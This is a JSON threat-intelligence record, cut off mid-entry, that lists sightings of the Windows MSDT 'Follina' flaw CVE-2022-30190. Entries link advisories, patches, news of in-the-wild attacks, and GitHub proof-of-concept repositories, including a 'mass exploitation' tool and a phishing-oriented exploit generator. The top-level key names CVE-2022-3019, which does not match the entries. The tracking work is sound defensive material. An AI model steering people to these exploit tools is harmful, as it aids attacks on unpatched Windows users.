{"vulnerability": "CVE-2022-3019", "sightings": [{"uuid": "910fefac-0270-4967-b84a-77a8f1858ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/b7effe8d-f245-44fd-94ef-5f2f693cfb06", "content": "", "creation_timestamp": "2022-09-30T08:50:28.000000Z"}, {"uuid": "75760ae9-9019-4d3f-ab6d-99f2a7d38538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2022-06-21T18:38:00.000000Z"}, {"uuid": "35b78d10-3136-419d-91fd-41142c2125ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3410ad13-ef34-48c9-bc6f-b1b111a30e06", "content": "", "creation_timestamp": "2022-06-23T13:12:55.000000Z"}, {"uuid": "a0a2cf86-7566-40b6-9083-8ae8456f113c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "6a32a493-934b-4714-96cf-b465b946c6b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "d1293f12-e28c-439d-ab8d-86b033275394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/e7824ab3-14c8-4fc3-ada2-930b0487144c", "content": "", "creation_timestamp": "2022-06-21T06:36:06.000000Z"}, {"uuid": "22ae57ed-180a-4e4a-8366-690e3eec2413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "content": "", "creation_timestamp": "2022-05-30T05:00:00.000000Z"}, {"uuid": "5545302c-24ca-462d-a85f-1aa82f714bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/a67c65c39634310289635ecf99dea9a6", "content": "", "creation_timestamp": "2025-01-07T11:17:15.000000Z"}, {"uuid": "54cf600f-a2ec-44bf-bcf5-771251e358ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971663", "content": "", "creation_timestamp": "2024-12-24T20:32:30.507284Z"}, {"uuid": "ef5800b2-3d92-4ce1-b83d-dcad2c07ec0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/3a597fc9e98398f18b8f135687964a65", "content": "", "creation_timestamp": "2025-02-07T07:21:16.000000Z"}, {"uuid": "60b8af5e-ee6f-449c-88bf-00eddada910c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "7af661e6-b399-44a9-beb0-93369e25ffa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3ll3dsf4wsv24", "content": "", "creation_timestamp": "2025-03-23T22:59:31.372080Z"}, {"uuid": "a250de35-b8e0-4cf0-b69d-e1437c8ad258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:46.000000Z"}, {"uuid": "cab41f2f-ce32-4dfe-9850-7eb20122850e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:37.000000Z"}, {"uuid": "ca6f3b44-1a0e-41b3-9e5f-747256d94b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lleoqhxjgv2l", "content": "", "creation_timestamp": "2025-03-27T16:09:15.956404Z"}, {"uuid": "ce9eed15-48a5-4001-bd35-410849a6769b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2025-04-11T08:52:00.000000Z"}, {"uuid": "6993d5d8-8eeb-4aa1-b568-0db847976627", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", "content": "", "creation_timestamp": "2022-06-06T20:02:58.000000Z"}, {"uuid": "6f168bc1-30ed-4dfa-8519-5cb739eb4f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-5160f4b6-f5bea135b10e56d0", "content": "", "creation_timestamp": "2025-06-11T13:05:26.587857Z"}, {"uuid": "d73f967d-a96e-4668-9b5e-6b38ff39f5d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/1f469f99675752c7ae1749a43429185d", "content": "", "creation_timestamp": "2025-04-27T13:33:59.000000Z"}, {"uuid": "9e131209-76ee-43a8-8b1f-558691318df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/356b6be98f75b1f7f00096fb3de09f7d", "content": "", "creation_timestamp": "2025-07-01T16:33:57.000000Z"}, {"uuid": "cd1dc2eb-2db9-4275-971b-274cf7e9900f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3luo32nqinkl2", "content": "", "creation_timestamp": "2025-07-23T22:30:32.549661Z"}, {"uuid": "42bc957c-ef3d-4c85-86f0-c71a3212cf79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/09dc4628be4c6acef1445113651a4bbd", "content": "", "creation_timestamp": "2025-09-01T15:01:42.000000Z"}, {"uuid": "27803992-4c70-43e9-9ca0-9562f7930e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/19e3f897ebc190a0d9fba1ddb254e07f", "content": "", "creation_timestamp": "2025-08-01T15:12:03.000000Z"}, {"uuid": "14d645c4-33bb-4fd4-9d86-3da7d09a4334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ef4f79882a9a998824e5edb9a9c39d9f", "content": "", "creation_timestamp": "2025-10-31T22:18:16.000000Z"}, {"uuid": "e1d146b4-84ea-40f3-b6ec-7dbd68ee66ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2022-30190", "type": "seen", "source": "https://www.cert.at/de/warnungen/2022/5/remote-code-execution-schwachstelle-in-microsoft-windows-workarounds-verfugbar", "content": "", "creation_timestamp": "2022-05-31T13:31:13.000000Z"}, {"uuid": "70b2a4c6-a351-404e-99ac-a555611cdbca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:00.000000Z"}, {"uuid": "74158ae8-b8f1-48e3-944b-210cd22dba18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/244584afa823b7a82f1fc04b52872393", "content": "", "creation_timestamp": "2025-10-01T19:45:44.000000Z"}, {"uuid": "9d218953-990b-4ee2-b83e-c5e65c89f4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7c1fa1521d76b91a66875cf22cc1dbf2", "content": "", "creation_timestamp": "2025-12-01T07:56:27.000000Z"}, {"uuid": "443a3e46-fc7c-456a-819f-f0bc5b237d78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://sploitus.com/exploit?id=11EF8E6B-7CBD-5758-94E1-220BF0F529A7", "content": "", "creation_timestamp": "2025-10-18T09:43:12.000000Z"}, {"uuid": "b65f93c7-1058-433a-bbf0-30d2d2d97881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ca50029f36cfd4b84b9f9e5785d4a904", "content": "", "creation_timestamp": "2026-03-04T12:43:32.000000Z"}, {"uuid": "edbd850f-ae8e-4cc0-9010-3cf4db43d7ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mgfs726gpy2b", "content": "", "creation_timestamp": "2026-03-06T17:03:59.589984Z"}, {"uuid": "0d42ede6-b532-47c1-8ff8-972f4ce71d41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7956a2cb84c64f8278087c33a21a2617", "content": "", "creation_timestamp": "2026-01-03T10:10:27.000000Z"}, {"uuid": "1b051cc6-0648-43bf-9ac4-2ab83779ca0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/f0ea883416140b0333e5b1d33f3751c8", "content": "", "creation_timestamp": "2026-02-02T12:06:45.000000Z"}, {"uuid": "36af6b22-081e-475e-b7e5-791b1395406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2379", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass-rce\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T17:39:40.000000Z"}, {"uuid": "25fb4c5d-bcb0-47a4-acb8-465cc1184bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/23f2147b9bc46faaa2ed0d46e177aee6", "content": "", "creation_timestamp": "2026-04-03T14:42:52.000000Z"}, {"uuid": "87d0fc62-7795-4ec7-ad01-93aa7f43051a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_10/2022", "content": "", "creation_timestamp": "2022-05-31T08:23:44.000000Z"}, {"uuid": "a5cb34a6-b197-4c4b-b7ab-4a2cd772b3f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "96913d0b-6db9-4a0e-9d29-b289801b136a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=813", "content": "", "creation_timestamp": "2022-05-31T04:00:00.000000Z"}, {"uuid": "543d35ac-c3ee-4065-8904-ea4e9200e45d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=821", "content": "", "creation_timestamp": "2022-06-15T04:00:00.000000Z"}, {"uuid": "3eaa0b68-d3ed-4795-9b0e-6114e2c659ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/a24c34a5-ecd1-4d12-8e98-0503826daa06", "content": "", "creation_timestamp": "2026-02-02T12:27:20.086211Z"}, {"uuid": "b15b3c84-ce2b-4af3-81ad-58d46b09991e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2372", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigates the \\\"Folina\\\"-ZeroDay (CVE-2022-30190)\nURL\uff1ahttps://github.com/derco0n/mitigate-folina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T09:38:03.000000Z"}, {"uuid": "6c41a0bc-0594-42d0-9300-c1044f1fb2b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12319", "content": "Latest news and stories from BleepingComputer.com\nRussian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. [...]", "creation_timestamp": "2022-06-13T18:30:05.000000Z"}, {"uuid": "472eb34a-9d79-4ffb-92b9-d79175325469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12317", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. [...]\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-13T18:29:49.000000Z"}, {"uuid": "083e8663-9e75-4207-a5a0-05da1b0c1756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/sentinelblue/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:35:29.000000Z"}, {"uuid": "03f9897c-f933-42dc-8f76-133fbc0a662e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2440", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft MS-MSDT Follina (0-day Vulnerability) CVE-2022-30190 PoC\nURL\uff1ahttps://github.com/IamVSM/msdt-follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T09:16:45.000000Z"}, {"uuid": "68df786d-4558-40ab-9822-a1173422d1c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2510", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExtract payload URLs from Follina (CVE-2022-30190) docx and rtf files\nURL\uff1ahttps://github.com/MalwareTech/FollinaExtractor\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-15T02:38:56.000000Z"}, {"uuid": "822b980c-c09c-4af8-ae89-0e6885796550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2599", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-PowerPoint\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T08:55:03.000000Z"}, {"uuid": "34f01424-d37a-4d40-80e9-9ede5e6b6226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9665", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Zero-Day: Exploit code for Microsoft Windows Support Diagnostic Tool RCE.\n\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190", "creation_timestamp": "2022-06-05T06:52:17.000000Z"}, {"uuid": "fc96a364-bae5-4f9d-ad55-fcbbfd73cec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cKure/9750", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Follina patch CVE-2022-30190. (msdt.exe) is out.  \n\nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190", "creation_timestamp": "2022-06-15T09:39:46.000000Z"}, {"uuid": "0068ef32-c718-4136-90b1-2966da7e7563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/5180856b-d3c5-4036-9201-94693724365c", "content": "", "creation_timestamp": "2026-04-19T22:25:34.000000Z"}, {"uuid": "d97ca475-1454-43c9-aa7e-7aa12dcdd889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMS-MSDT Follina CVE-2022-30190 PoC document generator\nURL\uff1ahttps://github.com/sudoaza/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:34:44.000000Z"}, {"uuid": "96c0da42-43e5-49c0-a889-53c98b2399a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2363", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept zu MSDT-Follina - CVE-2022-30190. \u00dcBERPR\u00dcFUNG DER WIRKSAMKEIT VON MICROSOFT DEFNEDER IN DER JEWEILS AKTUELLSTEN WINDOWS 10 VERSION.\nURL\uff1ahttps://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:12:47.000000Z"}, {"uuid": "3693d8ab-153c-4bdd-943f-421f8a9e27cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2378", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 | MS-MSDT Follina One Click\nURL\uff1ahttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T22:59:39.000000Z"}, {"uuid": "777a2422-e630-4f06-ab73-1f54158253ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2377", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPDQ Package I created for CVE-2022-30190\nURL\uff1ahttps://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T15:37:01.000000Z"}, {"uuid": "0687f47a-3397-445d-90d9-4368ebcb319e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BleepingComputer/12587", "content": "XFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. [...]\n\nhttps://www.bleepingcomputer.com/news/security/xfiles-info-stealing-malware-adds-support-for-follina-delivery/", "creation_timestamp": "2022-06-30T14:24:55.000000Z"}, {"uuid": "0bd39e81-81e2-4a7a-ab26-37a8e1bbd4e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2375", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:11:44.000000Z"}, {"uuid": "3a125ccd-3cef-4ae4-adf2-5b3251eecced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2374", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190-follina.py-\u4fee\u6539\u7248\uff0c\u53ef\u4ee5\u81ea\u5b9a\u4e49word\u6a21\u677f\uff0c\u65b9\u4fbf\u5b9e\u6218\u4e2d\u9493\u9c7c\u4f7f\u7528\u3002\nURL\uff1ahttps://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T12:46:47.000000Z"}, {"uuid": "c95b73b5-455b-4d97-8a7a-c143b195f464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2446", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aD\u00e9sactivation du protocole MSDT URL (CVE-2022-30190) avec gestion des erreurs et de l'exit code pour un d\u00e9ploiement en masse\nURL\uff1ahttps://github.com/Rojacur/FollinaPatcherCLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T16:32:50.000000Z"}, {"uuid": 